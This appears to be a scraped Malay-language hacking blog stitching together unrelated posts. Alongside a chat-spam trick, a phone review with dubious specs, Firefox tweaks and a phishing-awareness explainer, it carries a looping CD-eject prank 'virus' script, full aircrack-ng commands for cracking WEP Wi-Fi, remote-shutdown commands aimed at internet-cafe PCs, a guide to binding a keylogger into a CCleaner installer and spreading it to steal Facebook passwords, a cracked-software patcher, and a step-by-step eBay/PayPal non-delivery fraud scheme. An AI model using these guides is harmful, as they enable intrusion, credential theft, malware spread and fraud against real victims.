Spam Facebook Group Chat

Salam,
Aku just nak tunjuk macam mana nak SPAM atau BOMB dalam Facebook Group (chatting aka IM). Tak ada lah hebat sangat pun, biasa-biasa je : . Mungkin ada yang tahu, tapi apa kata mereka yang tak tahu, kan?? 

Kadang-kadang dalam Facebook Group kita tu, terlalu ramai yang online, lepas tu, reply apa-apa entah je, menyebabkan kita nak baca satu persatu pun tak sempat. Kadang-kadang benda tu penting.

So, korang boleh balas balik dengan cara ni, untuk menyedarkan mereka agar jangan buat sesuka hati, faham perasaan orang lain sama 




CARA-CARA :

1) Buka Group Chat yang anda mahu
2) Dalam kotak taip tu : tekan SHIFT + ENTER (tekan jangan lepaskan, sampai berapa lama anda suka, tapi ingat lagi lama tekan, berhati-hati takut 'not responding' je, kalau PC/Laptop power tak pe)
3) Lepas tu baru taip apa yang anda mahukan
4) ENTER

Apa akan terjadi kepada mangsa? Mangsa tak larat nak scroll down dah  dah la Group Chat tu kecil je...


P/S : Pihak saya tidak akan bertanggungjawab jika berlaku sedikit insiden dalam membuat tutorial ini 
P/S : Mod, kalau salah section boleh move ke section sebetulnya, maaflah, saya cari section bersangkut ni tak tau dekat mana

Buat Virus CD/DVD Rom Buka Tutup


Kadang-kadang tu terasa bengang juga bila member-member asyik nak pinjam laptop atau PC kita, dah la tu buat macam harta sendiri pula.



Jom pekena mereka, bagi mereka pucat sikit. Jadi lepas ini, tidak ada lagi pinjam meminjam  Di bawah ini adalah tutorial cara membuat virus buka tutup CD/DVD rom anda. Jangan risau, virus ini tak bahaya, ianya cuma script biasa je  Kalau dah jadi kat member-member anda, mesti pucat ingatkan dah rosak laptop atau PC anda sebab CD/DVD rom buka tutup tak boleh nak stop.


1) Buka Notepad, copy code di bawah ini

Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop



2) Paste ke dalam Notepad

3) Save As sebagai fileanda.vbs
anda boleh tukar nama file itu.


Explaination :

wcript.sleep 5000 --> 5000 anda boleh ubah, contoh ubah 5000 ke 10000. Maksudnya nilai kat sini ialah masa untuk delay selepas CD/DVD rom ditekan masuk balik. 5000 = 5 saat. Cubalah sekarang!

Macam mana nak hentikan??
- Restart Laptop atau PC
- Hentikan virus wscript dalam Task Manager ( Ctrl + Alt + Del ) > Process > cari program nama wscript


Semoga membantu  Syhhh! jangan bagitau orang! 
 

Update Your Facebook Status Via iPhone 4S [With Review]


The update via iPhone 4S is really a new way to get involved in the world of iPhones.This via has included with a 44 Thousand rupee phone which no one likes to buy.The reason is not that it is bad in it`s range but the range that iPhone is costing.It`s is the rate of the  half Nano in India because this much cost can make you buy a half Nano approx.
.Lets have some review of the gadget before You Get The Via

Brand:The brand of apple is known for it`s superb phones.This iPhone 4S is also another smartphone from the apple limited.


iPhone 4S screenshot for facebook
Features:
  • The iPhone is having many new features which everyone want to buy but it`s cost come in way for all the fans.
  • It`s having a 8 MP camera with Dual core A-5 Chip  for the better functioning.
  • The iPhone offers you to record a 1080p amazing high definition video.
  • The iPhone 4S is having a finger-protecting coating that will preserve your phone for long time.
  • The Camera of iPhone 4s is having  a 8 MP approx ability.You can store a 1080p Video that`s a huge amount in mobile segment.
Display Of iPhone 4S:
  • The Screen Resolution:The iPhone is having a screen resolution of the 960*699 pixels
  • The contrast ratio is also worth buying because it`s having a 800:1 contrast ratio which is one in it`s kind.
Battery Backup:
  • The battery backup of the iPhone 4S is really worth buying.
  • It support a talktime of 8 hours on 3G and 14 hours on 2G.
  • You can use internet for 6 hours in 3G and 9 hours in 2G
The iPhone 4S is a revolutionary phone of it`s kind till now.Apple is the best company manufacturing the awesome and unmatched phones for the users.Steve Jobs is the “Man Of Thoughts”.Though he is not with us now.But he has setup of the Apple Inc. for the next 15 years from now before his death.The iPhone 4S is having a RAM of 512 MB and along with that you are getting a high storage capacity of 64 GB.This iPhone is really a superb option for the person who have lot of money to burn.Unlike Samsung Galaxy ,apple has not become so famous in many countries because of it`s prize.The OS is also very easy for the users to use it.

The Siri features are being improved by iPhone 4S now.The voice recognition features make the Siri very known topic today.Siri require a 3G connection or a Wifi connection to work.The iOS 5 have no features for the offline users.The simple voice commands are also require a connection to internet.
The Camera features are also improved in iPhone 4S now unlike the old iPhone 4.It`s having a sensor on the backside for sensitivity which is literally improved from the iPhone 4.

Now You can use this via in two parts.From the First link you will be updating via “Iphone 4S” and another is via “Apple iPhone 4S” choose the appropriate and comment.
Click Here To Update via iPhone 4S


Click To Update via Apple iPhone 4S

Hack WEP WIFI Menggunakan Backtrack 4


Tutorial dibawah ini dikongsi bertujuan untuk pembelajaran. Pihak kami tidak akan bertanggungjawab sekiranya perkara yang tidak diinginkan terjadi.



Bagaimana nak Hack WEP WIFI password? Anda boleh menggunakan software Backtrack 4 iaitu sejenis sofware yang run ketika boot (carnya lebih kurang installer windows). Pelajari betul-betul step by step agar boleh difahami dengan mudah. (maaf, tutorial versi English sikit ya!)


CARA-CARA :

First, you will need to have Backtrack 4 .
you can download it here http://www.backtrack-linux.org/downloads/

I use the DVD version, U can get it from official Backtrack web.. After downloading and burning BT4, you will have to put the CD in your computer, then restart. It should automatically load BT4. if you will then be asked to log in...
login: root
pass: toor

After logging in, type in: startx

After that, BT4 should be up and running. Read below to see what you have to do next.

-------------------------------------------------------------------------

NOTES

These are all different colors because they coordinate with parts of the code you will have to change when typing them.

wlan0 = Interface (Examples: wlan0, ath0, eth0)

ch = The channel the target is on (Examples: 6, 11)

bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)

ssid = Name of target (Examples: linksys, default)

filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)

fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)

PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
Ignore “:”

-------------------------------------------------------------------------

WEP CRACK GUIDE

1. Boot computer with Backtrack 4 (login: root , pass: toor / “poweroff” at end)
2. Open Konsole and type the following:
3. airmon-ng (You will find your Interface here)
4. airmon-ng stop wlan0 ***My interface is wlan0. It may be yours also. Replace all the wlan0 with your own interface!***
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Hit CTRL+C after finding WEP wanting to crack, then COPY THE BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Open new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Open new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap

-------------------------------------------------------------------------

ALTERNATE ATTACKS

FRAGMENTATION
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap

CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK


Video Tutorial :



------------------------------------------------------------------------

apa yang anda perlukan adalah,wifi card yg compatible n bole inject packet..
the best wifi card is ALFA Network n most used by backtrack user..
kat sini ada list working n x working driver for wifi card...makesure u know before buy a new wifi card..aku da terkene..haha
TP-Link wifi usb not support at all....

http://www.backtrack-linux.org/wiki/...reless_Drivers


This tutorial for crack WEP WIFI password only, not for WPA/ WPA 2- PSK. Semoga Berjaya!
 
 

Melajukan Firefox Sepantas Kilat (Advanced User)



Tutorial di bawah hanya di copy paste dari sumber yang dipercayai. Sumber ini versi english. Harap anda dapat menghayatinya 


Firefox is in my opinion the best browser ever made until now. It includes:

-improved tabbed browsing

-pop up blocking

-integrated Goggle search

-enhanced privacy controls

-built-in phishing protection

-online spell checking

-lots of themes, interfaces, and extensions/addons



Mozilla Firefox officially supports:

-Microsoft Windows

-Linux

-Mac OS X



Unofficial Support:

-Free BSD

-OS/2

-Solaris

-SkyOS

-BeOS

-XP Professional x64 Edition



Now here are some Tips&Tricks that can help you double the speed of Firefox.



1. Type about:config in the address bar and then press Enter. 



2. In the filter search bar type network.http.pipelining. Be sure the value field is set true,if not double-click to set true. HTTP is the application-layer protocol that most web pages are transferred with. In HTTP 1.1, multiple requests can be sent before any responses are received. This is known as pipelining. Pipelining reduces page loading times, but not all servers support it.



3. Go back to the filter search bar and type network.http.pipelining.maxrequests. Double-click this option and set its value to 8.



4. In the filter search bar and type network.http.proxy.pipelining. Once opened doubleclick on it and set it to true.



5. In IPv6-capable DNS servers, an IPv4 address may be returned when an IPv6 address is requested. It is possible for Mozilla to recover from this misinformation, but a significant delay is introduced.

Type network.dns.disableIPv6 in the filter search bar and set this option to true by double clicking on it.



6. CONTENT INTERRUPT PARSING

This preference controls if the application will interrupt parsing a page to respond to UI events. It does not exist by default. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Boolean from the pop-up menu. Then:

A. Enter content.interrupt.parsing in the New boolean value pop-up window and click OK

B. When prompted to choose the value for the new boolean, select true and click OK.



7. Rather than wait until a page has completely downloaded to display it to the user, Mozilla applications will regularly render what has been received to that point. This option controls the maximum amount of time the application will be unresponsive while rendering pages. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.

A. Enter content.max.tokenizing.time in the New integer value pop-up window and click OK

B. You will be prompted to enter a value. Enter 2250000 and click OK.



8. CONTENT NOTIFY INTERVAL

This option sets the minimum amount of time to wait between reflows. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.

A. Type content.notify.interval in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 750000 and click OK.



9. CONTENT NOTIFY ONTIMER

A. This option sets if to reflow pages at an interval any higher than that specified by content.notify.interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Boolean from the pop-up menu.

B. Type content.notify.ontimer in the New boolean value pop-up window and click OK.

C. You will be prompted to choose the value for the new boolean. Select true and click OK.



10. Notify Backoffcount

This option controls the maximum number of times the content will do timer-based reflows. After this number has been reached, the page will only reflow once it is finished downloading. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.

A. Enter content.notify.backoffcount in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 5 and click OK.



11. CONTENT SWITCH THRESHOLD

You can interact with a loading page when content.interrupt.parsing is set to true. When a page is loading, the application has two modes: a high frequency interrupt mode and a low frequency interrupt mode. The first one interrupts the parser more frequently to allow for greater UI responsiveness during page load.

The low frequency interrupt mode interrupts the parser less frequently to allow for quicker page load. The application enters high frequency interrupt mode when you move the mouse or type on the keyboard and switch back to low frequency mode when you had no activity for a certain amount of time. This preference controls that amount of time. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.

A. Enter content.switch.threshold in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 750000 and click OK.



12. NGLAYOUT INITIALPAINT DELAY

Mozilla applications render web pages incrementally, they display what’s been received

of a page before the entire page has been downloaded. Since the start of a web page

normally doesn’t have much useful information to display, Mozilla applications will wait

a short interval before first rendering a page. This preference controls that interval. Rightclick (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.

A. Enter nglayout.initialpaint.delay in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 0 and click OK.



Close Browse and relaunch your firefox seperti biasa, rasailah pecutan beberapa milisecond.

Hack Computer LAN (Seperti Internet Cafe)


Tutorial dibawah ini dikongsi bertujuan untuk pembelajaran. Pihak kami tidak akan bertanggungjawab sekiranya perkara yang tidak diinginkan terjadi.



Dari Julia, Julia nak share tutorial macam mana nak hack LAN Computer (computer yang internet bersambung satu rangkaian seperti internet cafe). Tapi dalam versi english la ya! 


Do you need to shutdown a server or other remote computer? Need to do this from the convenience of your own PC? Here's how to shutdown a remote Windows computer from your own desktop.

1. Open the command prompt. This may be done by clicking on the "Start" button, and selecting "Run".

2. Type in cmd and press Enter.

3. Type in shutdown -m \\computername, replacing "computername" with the name of the computer you wish to shutdown or the computers ip address.

4. Experiment with the shutdown command's switches.

-r will force a restart, disabling any services or user interaction from interrupting it.
-c "comment" will force a comment to appear on the system being shutdown.
-t xx will force a timeout for "xx" seconds. For example, -t 60 would perform a shutdown after a 60 second timeout.
-a will abort the shutdown
* A full command example: shutdown -m \\myserver -r -c "This system will shutdown in 60 seconds" -t 60

Another method is to
* type shutdown -i in the run window.
* Click the "Add" box and type the name of the computer you want to shutdown or it's IP address. You can select what you want the computer to do.
* In this mode, it is NECESSARY to add a comment. Finally press "OK".

Tips...

* For a complete list of the switches (options) for the "shutdown" command, type inshutdown ? inside of a command prompt window.

* The target computer and your PC need to be in the same Domain or Workgroup for this to function correctly.

* This will only work on Microsoft Windows based systems. Linux and Mac will require different terminal commands.

* You may also run this shutdown command directly from the "Run" dialog. Opening a command prompt is merely a convenience in case you happen to type in the wrong system name or need to search for the name of the system to shutdown.
 

Hack Facebook Dengan Keylogger Server (100% FUD)



Tutorial dibawah ini dikongsi bertujuan untuk pembelajaran. Pihak kami tidak akan bertanggungjawab sekiranya perkara yang tidak diinginkan terjadi.

Maaf, tutorial ini di dalam bahasa Inggeris. Cuba fahamkan betul-betul.

Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.


Step 1. Creating the Keylogger Server
1. Download the keylogger.
2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).

3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.

hack facebook password,how to hack facebook,how to hack a facebook account

4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.


Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger to Ccleaner setup file. So open the Ccleaner setup with resource hacker.
3. Now in menu there is one action button click on it and then click save all resources.

how to hack facebook passwords,facebook hack, how to hack into someones facebook


4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).


Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.

facebook password hack,how to hack someones facebook,facebook password hacker,facebook hacking


5. Now again go to File's menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the victim that is your friend.


Step4 : How to Spread Keylogger or send it to victim or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it.
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn't that so easy to hack anyone's Facebook account in just few minutes.

How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don't use cracked softwares and don't download them from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.

Apa Itu Pishing??

Salam..jom kita sama-sama belajar apa itu phishing dan tujuannya..


Phishing merupakan percubaan untuk melakukan jenayah penipuan dengan mendapatkan maklumat sensitif, seperti username, password dan butiran kad kredit, dengan muncul sebagai entiti yang dipercayai dalam sebuah komunikasi elektronik. Bank online, eBay, PayPal dan lain-lain adalah target umum seorang penggodam. Phishing biasanya dilakukan melalui e-mel atau mesej segera dan sering mengarahkan pengguna untuk memasukkan butiran di sebuah website. Phishing adalah contoh dari teknik kejuruteraan sosial yang digunakan untuk menipu pengguna. Percubaan untuk menangani peningkatan jumlah insiden phishing termasuklah melalui perundangan, latihan kepada pengguna, kesedaran masyarakat, dan langkah-langkah teknikal.





Percubaan phishing yang terbaru telah menyasarkan pelanggan bank dan perkhidmatan pembayaran dalam talian. laman jejaring sosial seperti Orkut juga merupakan target phishing.

E-mel palsu adalah alat yang paling banyak digunakan untuk melakukan serangan phishing. Dalam banyak kes kita mendapat e-mel palsu yang tampaknya telah datang dari laman yang dipercayai. di sini seorang penggodam boleh meminta pengguna untuk mengesahkan username dan password dengan membalas ke alamat e-mel yang diberikan.




TEKNIK SERANGAN PHISHING


1. Pautan Manipulasi

Sebahagian besar kaedah phishing menggunakan beberapa bentuk penipuan teknikal yang direka untuk membuat link dalam e-mel yang kelihatan seperti milik beberapa pertubuhan yang dipercayai atau organisasi palsu. URL yang salah ejaannya atau penggunaan subdomain adalah trik umum digunakan oleh phisher, seperti contoh URL dibawah:

www.micosoft.com

www.mircosoft.com

www.verify-microsoft.com

dan bukannya www.microsoft.com


2. Filter Evasion

Phisher telah menggunakan gambar (bukan teks) yang membuatkan ia lebih sukar untuk anti-phishing mengesan teks yang umum digunakan dalam e-mel phishing. Ini adalah alasan Gmail atau Yahoo akan mematikan gambar secara default untuk emel yang masuk.


Bagaimanakah rupa serangan phishing/scam?

Apabila kaedah penipuan menjadi lebih canggih, begitu jugalah mesej e-mel dan tetingkap pop up yang telah dicipta. Mereka sering memasukkan logo rasmi dari organisasi nyata dan maklumat pengenalan lain yang diambil secara terus dari laman web yang sah. Ini adalah contoh bagaimana e-mel phishing kelihatan:





Contoh mesej phishing, termasuk alamat URL palsu yang dihubungkan ke sebuah laman web scam/penipuan.

Untuk membuat e-mel phising tampak lebih asli, para phisher/scammer akan meletakkan:

1. Sebuah link dalamnya yang dihubungkan ke laman web yang sah,
2. Tetapi sebenarnya membawa anda ke sebuah laman web phising
3. Atau mungkin pop-up yang tampak persis seperti laman rasmi.

Laman-laman tiruan juga disebut 'spoofed website'. Setelah anda berada di salah satu laman web palsu tersebut, anda akan menghantar maklumat peribadi kepada para penggodam.


Bagaimana mengenalpasti e-mel palsu?

Berikut adalah beberapa frasa untuk mengesannya, jika anda merasakan mesej e-mel tersebut adalah phishing scam.

"Pengesahan akaun anda."

laman web yang sah tidak akan pernah meminta anda untuk menghantar kata laluan, nama, nombor Jaminan Sosial (Social Security number), atau maklumat peribadi yang lain melalui e-mel.

"Jika anda tidak merespon dalam masa 48 jam, akaun anda akan ditutup."

Mesej ini menyampaikan keadaan terdesak sehingga anda akan memberi respons dengan cepat tanpa berfikir.

"Pelanggan Yang Terhormat."

Emel Phishing biasanya dihantar dalam keadaan tidak mengandungi nama pertama atau terakhir.

"Klik link di bawah untuk mendapatkan akses kepada akaun anda."

mesej berformat HTML boleh mengandungi pautan atau bentuk yang anda boleh mengisi seperti mengisi borang di laman web. pautan yang anda didesak untuk klik mungkin mengandungi semua atau sebahagian daripada nama sebuah syarikat nyata/asli dan biasanya "ditopengkan," bererti bahawa link yang anda lihat tidak membawa anda ke alamat itu tapi di suatu tempat yang berbeza, biasanya laman web scam/palsu.


Jadi perkara penting untuk mempertahankan diri dari serangan phishing adalah:

1. Jangan beranggapan bahawa e-mel dapat disahkan berdasarkan pada alamat e-mel penghantar.

2. Sebuah bank yang dipercayai / organisasi seperti paypal tidak akan pernah meminta anda untuk memberi nama penuh dan password anda di dalam emel paypal.

3. Sebuah email dari organisasi dipercayai tidak akan mengandungi lampiran atau perisian.

4. Mengklik link dalam e-mel adalah cara yang paling tidak selamat untuk masuk ke akaun anda.

Microsoft Visual Basic 2008 Express Edition Patcher

Assalamualaikum dan salam sejahtera buat semua yang masih sudi membaca di blog.Penjenayah Cyber. Gracias! Ok-ok, kali ini, saya nak kongsi dengan anda semua 1 patcher yang dibuat oleh saya sendiri. Patcher ini berfungsi untuk membuat software programming Visual Basic 2008 Express Edition menjadi registered! Sebenarnya, software ini berbayar, tetapi dengan menggunakan patcher ini, anda tak perlu risau untuk beli.

Mungkin dah ramai jumpa crack, patcher dan lain-lain di Google, tapi saya saja je nak uji kemahiran saya sikit dalam programming dengan berpandukan Google dan Youtube juga. Jadi, anda semua boleh tengok tampilan patcher tersebut dibawah:


Jika berminat untuk download tool patcher yang saya buat ini, anda bolehlah lihat link dibawah.

Link: http://www.mediafire.com/?fk3f5van84qj4qx |*Maaf, sizenya agak besar sikit. Tapi ia agak berguna!
Result virus total: https://www.virustotal.com/file/822d6a85fa7c3442ea96dbcb2e753f1f4dc30ae3662ac2d8d4adca3b305d4e83/analysis/1350464741/

How to scam Paypal Users on EBay and make money


Do you want to get your revenge on networkowned sites like eBay and Paypal and make large bank at the same time?
It’s simple, I’ll explain 3 easy steps to accomplish this.
First off, lets remember that Paypal is not a Payment service, so whatever happens between a buyer and seller using the ebay/paypal system is always between the buyer and seller.
Next lets keep in mind that Paypal is out to get all your money, or anything they can get by charging you high usage fees and high final value fees on eBay. Sell something for $100 on eBay and you will pay $25.00 or more in the end. So keep in mind they are ripping off the sellers before anything is even said. So “an eye for an eye”, in my opinion.
Lets also keep in mind that most if not all 0 percent feedback buyers on ebay are actually out to screw the seller or not pay you. So the fraud is mounting already before you even do anything.
Lastly before we get started keep in mind that Paypal or eBay has no jurisdiction over your goods that you sell or buy off eBay so neither eBay or Paypal can’t be held responsible for anything that goes wrong.
Now lets begin with the perfect eBay/Paypal scam:
Step 1: Go to your bank account and get a savings account placed in your name.
Step 2: Go online and start a paypal account under and add that that bank account to your paypal account.
Step 3: Find a real expensive item that a buyer might want to buy such as a guitar and post it for sale.
Tell the buyers inside the auction that you need to be left your positive feedback before you ship out the item so you can get paid, because the item is a large ticket item. If you have to point them to the Paypal policy that states they hold funds for 21 days until positive feedback is left. Your auction should be set so that you offer refunds, and the seller pays for return shipping. You can always use that as a bargaining tool to get them to leave your feedback right away. You can also let them know that if they don’t get the item the feedback can be revised and go ahead and explain to them how that is done. You should also have multiple auctions going at the same time, so you can get paid by a bunch of people.
Step 4: Once the buyers send you payment to your paypal account, simply withdraw the funds to your checking, and then contact the buyers stating you got their payments and their items will now be shipped out. Go to your local post office and send them a letter with tracking with nothing in it, and then furnish them with a tracking number 3 days later and let them know the package was mailed out late because you had a death in the family. By this time, your money had been deposited into your checking account from 5 different buyers for “X” amount of dollars. After you confirm that the money has been deposited into your account, simply go to your bank and tell the officer you wish to close out your account (your using for paypal) and use the excuse that someone got into your paypal account and your doing it for security reasons. You don’t even have to give an excuse just tell the clerk (bank officer) that you wish to close out the account and withdraw the money from it.
Step 5: Go back home and close out the paypal account or no longer use it. Then you can start another one with a new account at another bank. Remember paypal cannot verify name or address information on a bank account, they can only verify (for deposit reasons only) the routing number and account number. So you could in fact give them a name of “Jack Smith” when creating your paypal account and a fake address, as long as the routing and account numbers are the same as your bank account your deposits will still go into it. Never sign up or upgrade your paypal account to a business account because then they will require additional information on you and you will not be able to screw buyers.
I think because of the practices on ebay and paypal and all the hurt they have done to it’s sellers, they deserve all the fraud they get. We think an eye for an eye is the right thing here. This will prevent new buyers from signing up to the eBay system.
Now you might say well, can the buyer come after me for mail fraud? Well, you didn’t commit any mail fraud, you simply sent a letter in the mail with a tracking number on it, and the information you use in ebay and in paypal will be bogus anyway so they will never be able to come after you. Paypal will have to write the loss off, or tell the buyer they can’t refund the money especially after the seller closed their bank account Paypal will not be able to put their hands into it and get the funds. Remember Paypal allows $500 per month to be withdrawn at a time under a regular paypal account. And if the buyers do not leave the positive feedback for you to get your funds, you simply tell them you can’t ship it because you need to be paid in order to ship out a large ticket item like that. Some new buyers will take the bait and do it.
PaypalBlows, so lets show them we have the upper hand.
Source: paypalblows.org